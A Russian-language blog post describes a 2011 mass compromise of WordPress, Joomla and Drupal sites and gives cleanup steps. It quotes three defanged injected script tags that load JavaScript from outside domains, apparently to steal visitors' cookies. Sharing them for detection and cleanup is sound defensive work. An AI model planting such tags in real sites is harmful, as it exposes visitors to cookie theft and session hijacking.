Опубликовано : admin в (Без рубрики)
Массовый взлом сайтов на CMS WordPress, Joomla, Drupal
Начиная с 6 августа 2011 года владельцы сайтов словно по цепочке начали сталкиваться с проблемой входа в админку популярных CMS, таких как WordPress, Joomla и Drupal. При попытке входа в админку wordpress вылезало непонятное сообщение приблизительного вида:
Cannot modify header information – headers already sent by (output started at /aaa/bbb/ccc/www/blogname.com/wp-config.php:1) in /aaa/bbb/ccc/www/blogname.com/wp-includes/pluggable.php on line 532
Поиски в гугле, яндексе результата не дали, везде советовали попытаться сохранить файл без префикса BOM, но проблема была явно не в этом.
Когда я полез смотреть исходный код файла wp-config.php то увидел не очень приятную строчку следующего вида
<скрипт src=»хттп://yourerating.com/cookiesave.js»></скрипт>(специально часть символов заменил русскими буквами, дабы пользователи не старались переходить по этой ссылке)
По содержанию скрипта можно предположить, что он сливает куки на некий адрес. Но как он влез в исходный код? Загадка…
Покопавшись на форумах я понял, что данная зараза находится у большинста пользователей популярных CMS. На форумах было высказано предположение о сборе паролей FTP из клиентов total commander и filezilla для внедрения данного вредоносного кода в блоги. Причем скрипт у разных пользователей различался..на данный момент известно от трех его видах, возможно список будет пополняться
1.<скрипт src=»хттп://yourerating.com/cookiesave.js»></скрипт>
2.<скрипт src=»хттп://byhosted.com/ajaxengine.js»></скрипт>
3. <скрипт src=»хттп://googleconnects.com/tipslide.js»></скрипт>
Позже я понял что данный скрипт был вставлен не только в wp-config, но и еще в десяток файлов. Пришлось полностью чистить сайт от этой заразы…
Итак как же избавится от этого вредоносного кода:
1. Во первых меняем пароль на FTP и ни в коем случае не сохраняем его в total commander или filezilla. Запомните или запишите его на бумажке и вводите каждый раз вручную!
2. Скачиваем сайт себе на компьютер, запускаем total commander, входим в папку с сайтом и жмем сочетание Alt+F7, ставим галку «С текстом» и поочередно ищем файлы с текстом yourerating.com, byhosted.com, googleconnects.com. Во всех найденных файлах удаляем вредоносный код и снова заливаем файлы на сервер.
3. Смотрим, чтобы права доступа к файлам типа wp-config.php, index.php, header.php и т.д были 644
4. Делаем бекап сайта и БД(как это сделать можно найти в гугле, там есть инструкции для каждой КМС)
Регулярно проверяем свои файлы на наличие этого кода…если они появляются снова, повторяем процедуру и ставим сканирование компьютера на наличие вирусов.
Будем ждать выяснения окончательной причины заражения и выпуска заплаток.
Удачного всем сайтостроения!













